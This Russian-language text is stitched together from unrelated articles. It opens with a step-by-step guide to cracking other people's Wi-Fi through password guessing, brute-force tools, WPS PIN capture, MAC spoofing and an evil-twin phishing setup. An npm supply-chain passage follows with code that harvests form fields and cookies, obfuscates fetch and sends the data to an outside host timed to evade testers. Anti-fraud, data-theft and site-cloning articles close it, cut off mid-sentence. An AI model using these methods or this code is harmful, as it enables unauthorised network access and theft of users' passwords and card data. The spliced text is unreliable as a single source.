Хищения пароля от доступа к интернет ресурсу

Бесплатный беспроводной интернет – приятная находка для каждого. Скрытые Wi-Fi сети  в магазинах, кафе и других общественных местах порой не дают покоя. Некоторым так и хочется взломать пароль от Wi-Fi.

Редко встретится добрый человек, который не ограничит доступ к собственному интернету. Понятно, кафе и гостиницы привлекают посетителей бесплатной раздачей трафика. Однако встречается Вай-Фай с открытым доступом не только в таких местах, а у соседа по подъезду. То ли это уж слишком добрый человек, то ли он по натуре своей очень забывчив.

Как поступить, если срочно нужен интернет, но нет денег оплатить собственный? Какие же ухищрения придумали мудрые хакеры? Для бесплатного использования ближайшего Вай-Фая предстоит серьезная процедура взлома. Другие пути, которые могли бы помочь обойти авторизацию еще не известны общественности.

Методы взлома

Чего только в глобальной сети не найдешь, даже описания мошеннических действий по добыче бесплатного Wi-Fi. Если знания в области интернет-технологий не значительны, то лучше попросить помочь знакомого хакера. Кому под силу справиться самостоятельно, вот несколько популярных способов:

• угадать пароль;
• использовать специальную программу, чтобы она подбирала «ключ»;
• раздобыть PIN устройства;
• «фишинг»;
• перехватить пароль.

Как самостоятельно угадать пароль

В каждом методе первоначально стоит выбрать Wi-Fi с наилучшим уровнем сигнала. Выбрав первый метод, придется немного поразмыслить. Вряд ли соседский Вай-Фай серьезно зашифрован.

Если он далек от информационных технологий, обычный неопытный пользователь, то вряд ли он долго раздумывал над сложностью комбинации.

Скорее всего, он использовал свою дату рождения, супруги или ребенка, а может, и вовсе фамилию.

Когда самые простые варианты с личной информацией не прошли, стоит обратить внимание на другие популярные «пассворды».

Наиболее часто пользователи используют следующие комбинации цифр – «1234», «1111», «123123» и схожие с ними, также пароли из букв – «qwerty», «password» и прочие.

Часто встречаемых сочетаний для защиты Wi-Fi существует немало, в сети на эту тему полно информации, а также представлены конкретные сочетания.

Плюс у метода значительный – простота, но минусы также присутствуют – длительность процесса. Особенно много времени потратит ограничение на попытки ввода. Если на чужом Wi-Fi стоит такая штука, то после трех неудачных попыток пароль придется вводить только через день вновь.

ПО для разгадывания пароля

Как же взломать сложный пароль от Wi-Fi? Принцип таких программ прост, они действуют по аналогии с человеком. Только компьютер в разы быстрее и смышленее. Программы имеют целые словари с популярными комбинациями.

Иногда машина подбирает пароли за минуты, бывает, процесс затягивается на несколько суток. Сначала в ход идут простые версии, далее сложные. Время распознавания зависит от степени сложности пароля.

Данную технологию еще называют «брутфорс», что и значит, поиск пароля.

К ознакомлению примеры программ – Aircrack-ng, Wi-Fi Sidejacking, Wi-Fi Unlocker AirSlax и другие. В интернете их множество, это лишь малая часть. Скачивая подобное программное обеспечение, мошенник сам рискует быть обманутым. Трояны и прочие неприятности мигом завладеют компьютером.

Мысль подключить технику для поиска пароля гениальна. Правда, в этом методе также есть свои минусы. Главный из них – отрицательный исход. Подбор может пройти безрезультатно. Это значит, что задумано слишком сложное сочетание символов, букв и цифр, которое еще не знакомо подобной программе.

Где взять PIN постороннего устройства

Заполучить PIN – несложное задание. Для чего стоит сходить в гости и переписать его с корпуса устройства для раздачи Wi-Fi. PIN полностью состоит из цифр. Не всегда устройство будет располагаться в удобном месте, но и на случай неудачи есть выход.

Еще один метод заполучить PIN – воспользоваться специальными программами. Можно воспользоваться, к примеру – CommView или Blacktrack. Такой вариант взлома запароленного Wi-Fi непрост. Устройство Вай-Фай постоянно обменивается пакетами информации между другими аппаратами, которые входят в зону его действия. Цель – перехватить данные.

Действовать нужно через компьютер или ноутбук с мощным железом, имея Wi-Fi карту с функцией Monitor mode. Создать загрузочный диск или флешку с дистрибутивом ПО для перехвата пакетов, установить оболочку на ПК. Выбрать сеть, а после переждать процесс перехвата около 10000 пакетов. Сначала программа выдаст PIN, а после и пароль.

Видео-материал по взлому сети с помощью стороннего ПО:

Совет: Запомните PIN-код. Когда хозяин изменит пароль, разгадать его будет гораздо проще,  зная PIN.

Изменение Mac-адреса

Как же еще распаролить Вай-Фай? В представленном методе вопрос в принципе неуместен, иногда пользователи оставляют сеть открытой, но ставят фильтр по MAC-адресам. Это особый идентификатор каждого устройства. Узнать разрешенные MAC-адреса можно применив специальную программу. Например, Airdump-ng.

Видео:

Узнав белый список «идентификаторов», меняем свой. Для чего необходимо открыть «Панель управления», нажать «Центр управления сетями и общим доступом», после выбрать «Изменение параметров сетевого адаптера». Выбрать необходимое сетевое подключение, зайти в «Свойства». Произвести настройку сети – ввести MAC-адрес из 12 символов. Далее, перезапуск, и «вуаля», все получилось.

Фишинг

Фишинг – это один из методов сетевого мошенничества. Он позволяет обманом раздобыть логин и пароль. Так, посетив сайт, можно посетить фишинговую страницу и ввести свои данные, которыми и завладеет взломщик.

• Информацию с секретными данными о Вай-Фай узнают с помощью программы WiFiPhisher.
• 
• По какой схеме работает ПО:

1. Настройка HTTP и HTTPS;
2. Поиск беспроводных сетей wlan0 и wlan1 до момента подсоединения к одному из них;
3. Отслеживание службой DHCP и вывод IP-адресов;
4. Выбор одной из доступных Wi-Fi точек;
5. Создается копия точки доступа, ей задается такое же имя. Скорость реальной точки уменьшается, благодаря чему пользователь начинает переподключаться и попадает на копию.
6. Браузер запрашивает ввод пароля, пользователь заполняет графу и пассворд попадает в руки мошеннику через WiFiPhisher.

Видео-инструкция:

Теперь у мошенника есть возможность настраивать посторонний роутер. Он может сменить WPS PIN, посмотреть данные для авторизации на любых ресурсах. С такими привилегиями появляется возможность отправлять пользователей банковских услуг на другие сайты, заполучая «свое».

Совет: Чтобы не попасться на «фишинговую» уловку, нужно всегда досконально перепроверять посещаемые сайты.

Варианты защиты собственной сети

Как оказалось, существует немало вариантов шпионажа за данными от Вай-Фай.  Всем у кого есть дома или в офисе маршрутизатор стоит усложнить доступ третьих лиц. Иначе каждый рискует быть жестоко обманутым. Рекомендуется воспользоваться следующими советами:

1. Придумать сложное сочетание для пароля – не менее 10-12 символов, где учесть раскладку клавиатуры, регистр, знаки и цифры.
2. Отключить WPS, эта функция запоминает авторизованных пользователей и подключает их вновь в автоматическом режиме.
3. Периодическая смена PIN используемого устройства, а также удаление заводской надписи с корпуса.
4. Ограничьте доступ к информации о PIN, не вводите его на сомнительных сайтах.

  Как узнать пароль от Wi-Fi соседа — топ-4 метода

Эти шаги помогут качественно защитить свою сеть. Теперь ее может взломать только хакер с большой буквы. Будьте уверены, если взлом удался, он где-то рядом. Только близкое расположение злоумышленника может его привести к благополучному исходу.

Приложения с известными данными миллионов Wi-Fi

А может ни к чему взламывать защищенный Вай-Фай? Пользователи всего мира создали некую базу с паролями и точками Wi-Fi. Для доступа к ней стоит скачать уже готовую программу и выбрать нужную сеть. Информацию получают в следующих приложениях:

• Wi-Fi Map – универсальное приложение для любой платформы телефона, оно покажет ближайшие Вай-Фай точки и пароли, если ранее кто-то уже подключался к выбранной сети;
• Shift WiFi – популярное приложение пользователей системы Android, также как и предыдущая программа показывает все сохраненные ранее пароли к Wi-Fi.

Обзор приложения Wi-Fi Map:

Список таких приложений постепенно пополняется. Существует риск заполучить некачественный продукт. Всегда безопаснее загружать ПО с официальных и проверенных источников.

Взлом Wi-Fi c телефона

Сегодня осуществить взлом сети Wi-Fi можно даже с мобильного гаджета. Это даже удобнее, чем с ПК. Телефон проще приблизить к устройству, которое нужно взломать. Существует масса платных и бесплатных приложений. Часть из них – обман. Платные между собой могут отличаться актуализацией баз.

На сегодняшний момент известны:

• Wi-Fi Prank;
• WiHask Mobile;
• IWep Lite.

Wi-Fi Prank – приложение «брутфорс». Для его работы необходима дополнительная закачка баз. Далее оно автоматически подбирает нужный пароль. Подходит для Android.

WiHask Mobile – действует по определенному алгоритму, не требует дополнительных баз. Работает до обнаружения скрытого пароля. Основано на той же технологии «брутфорс». Распространяется для системы Android.

IWep Lite – осуществляет поиск пароля на гаджетах iPhone. Для работы приложения необходима процедура активации. Необходимо найти сеть и выбрать статистику. После начинается автоматический поиск до удовлетворительного ответа с кодом.

Ответственность за взлом

Не зря говорят, что бесплатный сыр только в мышеловке. Эти слова можно отнести и к интернету. Бесплатное пользование законно лишь в общественных местах, там, где не приходит в голову мысль – реально ли взломать доступный Вай-Фай, так как он в открытом доступе. Здесь каждый может пользоваться сетью вдоволь.

Иное дело – взлом чужого аппарата. Другими словами – это мошенничество. А такие действия не являются законными. Все преступные нарушения в нашей стране ограничиваются законами. На всех «умников» найдется статья в УК РФ. Не рискуйте, подключите или оплатите собственный интернет.

Кража паролей: как наши учетные записи уводят через npm-пакет

Кража паролей лишит вас доступа к своей странице или может оставить без кругленькой суммы – вот оно, счастье злоумышленника.

Рассмотрим один интересный способ, как кража паролей может быть успешно реализована

Заполучить пароль или номер кредитной карты можно многими способами. Далее речь пойдет о том, как это делается при помощи внедрения кода в npm-пакет.

Вредоносный код, который и выполняет всю грязную работу, занимается поиском на странице браузера чего-либо из представленного ниже:

• любая форма для ввода;
• элемент со свойством, в названии которого встречается «password», «cardnumber», «cvc», «checkout» и т. д.

Если после события submit искомая информация найдена, на этой страничке есть чем поживиться.

• Из каждого поля формы извлекаем информацию: ( document.forms.forEach(…) );
• собираем «печеньки»: document.cookie;
• все это дело оборачивается всегда в рандомную строку: const payload = btoa(JSON.stringify(sensitiveUserData));
• а после, отправляется на промежуточный хост: https://legit-analytics.com?q=${payload};
• и в случае наличия полезностей – отправляется на сервер хакера.

Перевернем мир

Чтобы это счастье вышло в свет, нужно как-то заставить код попасть на потенциальные сайты-доноры. Можно пытаться пробиться через расширения браузеров, но это не так эффективно. Межсайтовый скриптинг – хороший вариант, но у него (у XSS) есть свои протоколы безопасности, и снова не те масштабы. Гораздо лучше подойдет npm.

Можно изобрести пакет, который будет на лету менять цвет консольного вывода в браузере.

Заставляем принять этот “полезный” апдейт в свои зависимости, при помощи пулл-реквеста для нескольких (любых) существующих пакетов в сети, и ждать.

Через месяц имеем 120000 скачиваний этого обновления и выполнение кода на более чем 1000 сайтов. Конечно же, это не панацея, и велика вероятность, что эфемерное обновление пакета не примут с распростертыми объятиями, но это безопасно, и есть шанс, что быстро не засекут.

А может, ложку дегтя?

Звучит все гладко и красиво, но есть некоторые вопросы, которые могут появиться у пытливого читателя, и их нужно развенчать.

Сетевые запросы от скрипта – код почти ничего не отправляет, т. е. постоянного обмена трафиком нет.

Отсылка собранного материала происходит с 19:00 до 7:00, когда безопасники и прочие тестеры уже ничего не тестируют.

Даже если тестировщик и захочет отличиться, код подменяет URL на “левый”, схожий с социальными сетями, и отправка происходит всегда в разное время: вот такой эффект неожиданности.

Поиск “странностей” в npm. Удачи! Временные и ресурсные затраты несопоставимы, ну а если и найдется что-то, то в коде нет и намека на fetch, XMLHttpRequest или адрес хоста, на который все отправляется.

const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() — 1)).join('');
self[k(i)](urlWithYourPreciousData);

«gfudi» – это fetch, но с переставленными буквами на одну, а self – это алиас window. Не используется ничего обычного, как fetch. Вместо этого, везде где можно, нужно применять EventSource(urlВашихЛюбимыхДанных). Даже если трафик буду слушать по serviceWorker-у, никто ничего не заподозрит т. к. ничего не отправляется в браузерах, которые поддерживают serviceWorker.

Использование CSP в качестве защиты. С точки зрения CSP наш код ничего запрещенного не делает, кроме отправки данных на какой-то домен. Да, CSP неплохо справляется с XSS-атаками и может ограничивать общение браузера с внешним миром, но действия скрипта не настолько масштабны, чтобы можно было что-то проанализировать.

const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);

Чтобы не поплатиться за взлом, нужно проверять CSP на наличие функционирующей системы блокировки (connect-src) и инструмент-перехватчик (default-src). Сделать это можно так:

fetch(document.location.href)
.then(resp => {
const csp = resp.headers.get('Content-Security-Policy');
// Смотрим, как работает CSP });

Проверять нужно в первый раз, чтобы пользователь, и прочие надзиратели ничего не заподозрили.

Куда теперь бежать?

Мошенничество в сети — Общие вопросы. Справка

В интернете можно столкнуться с мошенниками, цель которых — обманным путем получить от вас деньги или завладеть личными данными.

Узнав ваши фамилию, имя, отчество, номер телефона, пароли от учетных записей, паспортные данные, реквизиты банковских карт и другие сведения, преступники могут использовать их для доступа к переписке, для рассылки сообщений от вашего имени и для кражи денег.

В то же время личная информация пользователей нужна для работы многих компаний и сервисов. Например, при оформлении заказа в интернете вы обычно указываете свои фамилию, имя, отчество, адрес и номер телефона, а при подписке на рассылку — электронную почту.

Стоит ли передавать свои данные конкретному сервису или компании — решать вам. Чтобы не стать жертвой злоумышленников, узнайте о способах мошенничества и защиты от него.

Мошенники присылают письма от имени банков, сервисов или других организаций и запрашивают ваши конфиденциальные данные, например для подтверждения учетной записи или активации почтового ящика.

Цель таких писем — заставить вас ввести пароль или данные карты в поля поддельной формы. В результате ваша личная информация окажется у мошенников.

Примеры

• Вам пришло электронное письмо со ссылкой и предложением заработать без вложений или получить услугу бесплатно. После перехода по ссылке появляется форма, в поля которой нужно ввести логин, пароль, персональные сведения или реквизиты карты. Если вы введете свои данные, то рискуете стать жертвой мошенников.
• Пришло сообщение о взломе вашего аккаунта в социальной сети. В сообщении предлагают срочно перейти по ссылке и авторизоваться. Если вы введете логин и пароль, их перехватят мошенники и завладеют вашим аккаунтом.
• Вы получили письмо от имени дальнего родственника о крупном наследстве. Для его получения предлагают заплатить комиссию за перевод или сообщить данные карты. Когда вы переведете деньги или дадите доступ к карте, мошенник исчезнет.

Подробнее о
том, как распознать фишинговые письма и не стать их жертвой, читайте в Справке Яндекс.Почты.

Фишинговые сайты — это поддельные сайты, которые маскируются под настоящие. Пытаясь зайти на популярный сайт, пользователь попадает на сайт-подделку, который очень похож на оригинал. Все данные, введенные на таком сайте (пароли, номера банковских карт, паспортные данные и т. д.), окажутся у злоумышленников.

Типичные признаки фишингового сайта

• отсутствие SSL-сертификата сайта или ошибки при его проверке (нет значка безопасного соединения в адресной строке);
• неработающие или неверные ссылки на странице;
• устаревший дизайн страницы;
• отсутствие пользовательских соглашений, странный список контактов;
• грамматические, орфографические и дизайнерские ошибки на странице.

Как попадают на фишинговые сайты

• По ссылке из электронного письма или сообщения в соцсети. Адрес поддельного сайта обычно похож на оригинальный, но не повторяет его в точности. Например, в ссылке может быть указано yanclex.ru вместо yandex.ru — расчет на невнимательность пользователя. Однако бывает, что в тексте ссылки адрес сайта написан верно, но на самом деле она ведет на другой ресурс. Совет. Наведите указатель на ссылку и задержите. Обычно при этом в левом нижнем углу экрана отображается настоящий адрес ссылки. Сверьте его с адресом сайта.
• Через подмену сайта. Если устройство заражено вирусом, перенаправление на поддельный сайт может быть скрытым. В этом случае при вводе настоящего адреса вы попадете на поддельный сайт. Пример При попытке открыть небезопасную страницу Яндекс.Браузер заблокирует соединение. Как предотвратить подмену сайта Подмена сайта может происходить по двум сценариям:
  • Вирус искажает информацию о домене в DNS. Как защититься: если у вас Яндекс.Браузер, в него уже встроена защита DNS-запросов в рамках системы Protect. Также для настройки DNS вы можете воспользоваться бесплатным сервисом Яндекс.DNS.
  • Вирус меняет системный файл hosts на вашем устройстве. Как защититься: воспользуйтесь антивирусной утилитой Yandex Rescue Tool, Dr.Web CureIt! или Kaspersky Virus Removal Tool. Если вирус уже изменил файл hosts, в Windows вы можете исправить это:
    1. Перейдите в папку C:WINDOWSsystem32driversetc.
    2. Сделайте резервную копию файла hosts, затем откройте файл с помощью Блокнота.
    3. Удалите все строки, кроме следующей:127.0.0.1 localhost
    4. Cохраните файл. Перезапустите браузер и попробуйте еще раз перейти на сайт. Если загрузится нужная страница — проблема решена.
    5. Чтобы в дальнейшем защитить файл hosts от действия простых вирусов, сделайте его доступным только для чтения. Нажмите значок файла правой кнопкой мыши, выберите пункт меню Свойства, включите опцию Только чтение и нажмите кнопку OK.

Мошенники в социальных сетях рассылают сообщения с предложениями приобрести товар с большой скидкой или получить выигрыш за предоплату, а также с просьбами о помощи. Цель таких сообщений — убедить вас отправить деньги.

Примеры

• Вы не нашли нужную вещь в интернет-магазине и оставили заявку (или оформили предзаказ) в социальной сети. Мошенник нашел вас и предложил купить аналогичный товар с большой скидкой. При этом он попросил стопроцентную предоплату. Если вы внесете ее, мошенник исчезнет, не выслав вам товар.
• От вашего имени в социальной сети разосланы сообщения с просьбой одолжить денег. Скорее всего, вы придумали простой пароль к своей странице, и мошенник легко подобрал его. Срочно поменяйте пароль на достаточно сложный.
• Вам пришло сообщение от виртуального друга с просьбой помочь деньгами. Скорее всего, его аккаунт взломан. Фотография банковской карты с настоящим именем и фамилией не гарантирует подлинность: мошенники подделывают такие фото с помощью графических программ. Свяжитесь с этим человеком по другим каналам и уточните информацию.

Внимание. Существуют различные способы хищения информации, поэтому будьте внимательны, когда сообщаете сведения о себе.

Злоумышленники могут выступать в роли продавцов или покупателей на торговых площадках и сайтах объявлений. Их цель — перенаправить вас на фишинговый сайт или заставить заплатить по ложным реквизитам.

Пример

• Вы увидели объявление о продаже товара по цене намного ниже рыночной. В переписке продавец предлагает продолжить общение в соцсети или по почте, затем отправляет вам ссылку на страницу оплаты, адрес которой похож на адрес реального сайта. Если вы введете платежные данные на этой странице, деньги уйдут мошенникам, кроме того, они получат данные вашей карты.

Совет. Многие маркетплейсы блокируют сторонние ссылки в сообщениях. Чтобы не попасться мошенникам, работайте только с официальными сайтами торговых площадок, общайтесь во внутренних чатах, не переходите по ссылкам.

Некоторые сайты приглашают пользователей пройти опрос или заполнить анкету за вознаграждение. Чтобы получить заработанную сумму, предлагают оплатить комиссию или регистрационный сбор. На самом деле эти деньги достаются мошенникам, пользователи ничего не получают. Как правило, на таких сайтах предлагают неоправданно большую оплату за простые задания.

Встречаются предложения установить программу, которая «сама зарабатывает деньги» или майнит криптовалюту, а также поучаствовать в лотерее или получить финансовую помощь.

Примеры

• Вы увидели рекламу о заработке в интернете и перешли по ссылке. На сайте вам предлагают пройти регистрацию и ответить на простые вопросы. После выполнения заданий отображается крупная сумма вознаграждения, которое якобы вам начислено. Чтобы его получить, нужно перечислить «закрепительный платеж» или иной сбор. Если вы заплатите, эти деньги и ваши платежные данные уйдут к мошенникам, а вы ничего не получите.
• Вы установили бесплатную программу для заработка или майнинга, но появляется сообщение о необходимости платного обновления. Если вы это сделаете, деньги достанутся мошенникам, а вы не получите никакого дохода. Кроме того, вместе с программой часто устанавливается вредоносное ПО, которое может украсть ваши данные.
• Вы зашли на сайт, где можно сыграть в лотерею или получить материальную помощь. Вам выпадает крупный выигрыш или приходит положительный ответ о помощи. Но для получения денег нужно внести комиссию за перевод или другой сбор. Если вы заплатите, деньги и ваши платежные данные уйдут к мошенникам, а вы ничего не получите.

Примечание. Иногда такие сайты публикуют отказ от ответственности, например: «Мы не гарантируем заработок. Указанные суммы — предполагаемый доход». Внимательно читайте все пояснения, если они есть.

Узнайте больше из статьи Как Яндекс начал охоту на фальшивый заработок на Хабре.

• Не оставляйте незаблокированными смартфоны и компьютеры, не выбрасывайте бумаги и носители данных (жесткие и съемные диски, SIM-карты, SD-карты), на которых хранятся пароли.
• Если устройством пользуется несколько человек, разделяйте доступ к данным.
• Не храните в электронной почте и не выкладывайте в открытый доступ копии документов, удостоверяющих личность: если мошенники взломают вашу почту, они смогут воспользоваться личными данными.
• Перед работой на чужом компьютере перейдите в приватный режим. Если такой возможности нет, очистите кеш и cookie после завершения работы. Либо создайте отдельный профиль в браузере и после завершения работы удалите его.
• Регулярно проверяйте антивирусом съемные диски, SD-карты и прочие носители информации, которые вы подключаете к чужим компьютерам.
• Не вводите личную информацию в подозрительные поля, особенно в электронных письмах.
• Не открывайте вложения и не переходите по ссылкам из электронной почты или мессенджеров (Telegram, WhatsApp и т. п.) от сомнительных адресатов. Если адресат кажется вам подозрительным, внесите его в черный список.
• Позвоните по официальному номеру банка или другой организации, от имени которой было отправлено подозрительное письмо, и проверьте информацию.
• Перед онлайн-покупками проверяйте отзывы и рейтинг магазинов, аккаунты продавцов и условия оплаты.
• Пользуйтесь только официальными сайтами торговых площадок, общайтесь с продавцами или покупателями во внутренних чатах, не переходите по ссылкам на другие сайты и мессенджеры.

Кража данных

Кража данных — несанкционированное извлечение информации из мест ее хранения, которое обычно осуществляется путем взлома сетевых ресурсов. Объем и ценность данных с каждым годом увеличиваются, а с ними неизбежно растет и число краж. Киберпреступники похищают информацию у государственных структур, больших и малых компаний, некоммерческих организаций, частных лиц.

Последствия умышленных утечек такого рода могут быть самыми разными — от потери деловой репутации до серьезных межправительственных скандалов, хотя чаще всего кража информации в конечном итоге означает потерю денег.

Классификация и способы кражи данных

Все хищения данных осуществляются либо перехватом сообщений на линиях связи, либо через воровство носителя информации. Основные сценарии описаны далее.

Кража физического носителя

Самый прямой и грубый способ. Большинство современных устройств — ноутбуки, смартфоны, планшеты, подключаемые внешние диски и флешки — достаточно малы, чтобы можно было украсть их мимоходом, пройдя рядом со столом, где они лежат (например, если владелец отлучился на минуту от рабочего места).

У крупных компьютеров можно похитить жесткие диски, причем не обязательно безвозвратно. Весьма легко вообразить злоумышленника, который извлечет диск после окончания рабочего дня, скопирует всю интересующую его информацию и вернет накопитель на место ранним утром следующего дня. В таком сценарии владелец устройства даже не догадается о несанкционированном доступе к его данным.

Кража при доступе к носителю

При наличии физического доступа к носителю можно просто поработать на компьютере в отсутствие хозяина. Обеденный перерыв, длительные совещания, время после ухода по окончании рабочего дня — у коллеги-злоумышленника есть немало способов посидеть за чужой клавиатурой.

Если пароль учетной записи слаб или вообще отсутствует, то украсть данные сумеет любой, кто работает рядом. Впрочем, даже очень хороший пароль не всегда спасает: в конце концов, сотрудник может открыто попросить разрешения воспользоваться устройством, сославшись на неисправность собственного компьютера и необходимость срочно отправить письмо или файл.

Далее, например, к машине подключается флешка с вредоносной программой, скачивающей данные.

К этой же категории относится возможность подсмотреть информацию. Распространены случаи, когда множество сотрудников работает в одном большом помещении без перегородок, и соседям хорошо видно, кто что делает. Соответственно, преступник может как наблюдать лично, так и установить небольшую камеру, которая запишет все, что выводилось на экран чужого монитора.

Удаленная кража по сети

Если машина подключена к проводной или беспроводной сети, то прямой физический доступ к ней необязателен. В интернете доступно множество вирусов, троянских программ, бекдоров и прочих вредоносных агентов, которые злоумышленник может внедрить разными способами (скажем, путем эксплуатации уязвимостей). Также данные могут быть перехвачены при помощи снифферов, если каналы связи плохо защищены.

Кража данных с внешних серверов

Наконец, если данные хранятся в интернете (в облачном хранилище, на почтовом сервере и т.п.), то преступники могут осуществить несанкционированный доступ к этим ресурсам.

Для пользователей такой сценарий опасен тем, что помимо установки хорошего пароля у них нет никакой другой возможности повлиять на сохранность информации — всё программное обеспечение и все настройки доступа осуществляет владелец сервиса.

Объекты воздействия

Объекты краж данных можно разделить на два основных типа: физические носители информации и логические (виртуальные) сущности.

Доступ к физическим носителям возможен путем прямой кражи, временного выноса за периметр, обращения с просьбой к владельцу компьютера о возможности недолго поработать на его машине. Также злоумышленник может установить с внешнего носителя вредоносные программы, которые крадут и передают данные по сети на внешний сервер.

Информационно-логическое воздействие осуществляется посредством поиска уязвимого или устаревшего ПО, незащищенных портов, путем подбора логинов и паролей.

Последнее, к слову, актуально и в случае хищения носителей — с той разницей, что при краже ноутбука или смартфона преступник может не торопиться, тогда как временный либо удаленный доступ подразумевает необходимость взломать систему быстро.

Причины кражи данных

В голливудских фильмах кражи совершают команды профессионалов, где каждый выполняет свою задачу, а сложнейший план рассчитан по секундам. В реальной жизни подавляющее большинство хищений вызвано в первую очередь не мастерством злоумышленника, а беспечностью владельца. Кражи информации — не исключение: в ряде случаев пользователь сам предоставляет доступ к своим активам.

В первую очередь это касается отношения к носителям данных, которые нередко оказываются вне видимости и досягаемости владельца, отлучившегося за чашкой кофе или по вызову начальства, так что украсть их может любой проходящий мимо субъект. Соответственно, смартфоны, флешки, внешние диски лучше всегда носить при себе,  ноутбук — оставлять под присмотром надежных друзей, а стационарный компьютер — держать в комнате с физической защитой.

Вход в любую систему должен быть защищен паролем. Полезно иметь сразу три учетные записи — не только администратора и пользователя, но и гостя с минимальными правами (для посторонних лиц). Дополнительно можно шифровать особо важные файлы и папки. Все пароли должны быть сложными — прописные и строчные буквы, цифры, никаких осмысленных слов или связанной с владельцем компьютера информации.

Используемые программы должны своевременно обновляться, антивирус обязателен.

По возможности следует избегать любых сомнительных ресурсов — содержащих взрослый либо любой другой запрещенный контент, нелегально распространяющих фильмы, книги, программы, музыку.

Многих привлекает идея борьбы с авторским правом, однако далеко не все сторонники свободного распространения информации трудятся бесплатно: скрытый в модифицированном файле вирус обойдется пользователям намного дороже официальной покупки.

Также не стоит переходить по ссылкам, особенно тем, которые поступают с незнакомого адреса. Как правило, они ведут на фишинговые сайты. Ссылки на сайты мобильного банкинга и электронных платежных систем лучше вообще игнорировать, где бы они ни размещались — безопаснее просто набрать нужный адрес прямо в браузере.

Наконец, нельзя поддаваться методам психологического манипулирования (социальной инженерии).

Если вам звонит незнакомый человек, представляется сотрудником банка или еще кем-то, просит назвать номер счета, PIN-код, CVC или другую конфиденциальную информацию, то ничего сообщать ему не следует, даже если он будет пугать блокировкой счета, потерей денег и т.п. В таких случаях необходимо связаться с банком по официальным каналам.

Анализ риска кражи данных

Как уже отмечалось, большинство краж обусловлены не хитроумными планами злоумышленников, а беспечностью пользователей. Не оставляйте без присмотра флешку и смартфон, защищайте сложным паролем ноутбук и компьютер, выходите из системы, даже отлучаясь лишь на пару минут — и вероятность успеха преступников заметно снизится.

Особую сложность проблема хищения данных представляет в крупных компаниях.

Сотрудники сидят в одном большом зале, каждому видно происходящее на мониторах коллег, и к тому же в помещение могут заходить клиенты либо соседи по офисному комплексу.

Информация кочует с компьютера на компьютер на десятках флешек, а практика использования чужих машин является нормой. Иногда существует несколько стандартных логинов и паролей, которые знают все. В таких условиях утечки неизбежны.

В идеальной ситуации каждое рабочее место должно быть огорожено. Если такой возможности нет, отдельные ячейки должны получить хотя бы те машины, где обрабатывается важная и конфиденциальная информация. Не должно быть никаких общих, универсальных аккаунтов и кодов доступа: для каждого сотрудника — персональный логин и пароль.

Учетные данные должен выдавать администратор, во избежание появления простых и примитивных комбинаций. Нужно также следить за тем, чтобы на рабочем месте не было стикеров с паролями.

Если сотрудник неспособен запомнить пароль, то пусть он хотя бы носит записку с ним в бумажнике: сохранности кошелька должное внимание уделяют все люди.

Желательно приучить всех работников к мысли, что если они разрешают коллеге временно поработать на своей машине, то им лучше выйти из системы: пусть сотрудник входит под своим именем. Это позволяет избежать получения чужих прав доступа и отследить, кто проявляет подозрительную активность.

Важные и конфиденциальные данные на серверах должны быть защищены паролем; желательно, чтобы их видели только те, кому разрешен доступ к ним.

Впрочем, разрабатывая правила защиты информации, нельзя чрезмерно усердствовать. Если данные о закупках туалетной бумаги засекречены подобно устройству ядерной бомбы, сотрудники начинают воспринимать такие меры не как политику информационной безопасности, а как самодурство начальников — и, следовательно, нарушать правила везде, где нет прямого надзора.

Также важно учесть, что любое усиление защиты данных имеет свою цену — как прямую (стоимость программных и аппаратных продуктов), так и косвенную (усложнение работы, снижение производительности). Поэтому комплекс мер по защите информации следует разрабатывать соизмеряя затраты с возможным ущербом от утечки данных.

Что делать, если у вас украли сайт

Наиболее распространённый способ копирования контента — парсинг сайта.

Сам по себе парсинг — это не зло, если использовать его законно. Фактически это просто автоматизированный процесс извлечения данных с чужого сайта. С помощью парсеров можно отслеживать цены интернет-магазинов в открытом доступе или собирать данные для исследования рынка. 

Но мошенники часто пользуются парсингом в корыстных целях.

Злоумышленники могут сохранить страницы вашего сайта в форме статичного html/css/js кода. Делается это с помощью специальной программы-парсера. Она обходит весь сайт, сохраняет файлы в отдельную папку и заливает её на хостинг. Останется прикрепить домен — и новый сайт готов.

Также мошенники могут не скопировать ваш сайт, а подделать айдентику: создать очень похожие шрифты, логотип, цвета, добавить контент, обязательно похожий на ваш, но немного переработанный, чтобы успешно индексироваться поисковиком. Это довольно затратный способ и применяется нечасто. Обычно таким образом подделывают крупные торговые бренды с мощным трафиком, чтобы уводить клиентов. 

Ваш ущерб

Создание копии вашего сайта может причинить серьёзный вред вашему бизнесу.

Раньше наличие сайта-клона могло существенно навредить позициям сайта-оригинала в выдаче поисковика. Двойник даже мог занимать лучшие позиции в сравнении с оригиналом.

Сегодня поисковики научились определять оригинальные сайты, а те, которые копируют контент, — пессимизировать в выдаче. Но если злоумышленник немного переделал заимствованный у вас контент и добавил уникальности, то его сайт может индексироваться и присутствовать в результатах поисковой выдачи, отвлекая пользователей от оригинала.

Это точно может навредить безопасности ваших клиентов и репутации бренда.

Кража паролей

На странице-клоне мошенники ставят перехватчики данных для входа в личный кабинет. То есть все пароли, которые ваши покупатели введут на ложной странице, будут украдены. Использовать злоумышленники их могут по-разному: станут отменять заказы на настоящем сайте, выманивать деньги у клиентов, портить мнение о компании или рассылать спам.

Потеря репутации

Вследствие всего этого вы будете терять репутацию — ведь мошенники пытаются обмануть ваших клиентов. Отрицательные отзывы и снижение доверия неизбежны.

Что делать?

Зафиксируйте нарушение

Нашли незаконный клон вашего сайта — сделайте скриншот. Злоумышленник может в любой момент удалить данные с сервера или просто закрыть доступ к украденным страницам.

Обратитесь к нотариусу: он зафиксирует нарушение, осмотрит подозрительные страницы, составит и заверит протокол осмотра. Для верности вы можете также снять украденный сайт на фото и видео самостоятельно.

Загляните в настройки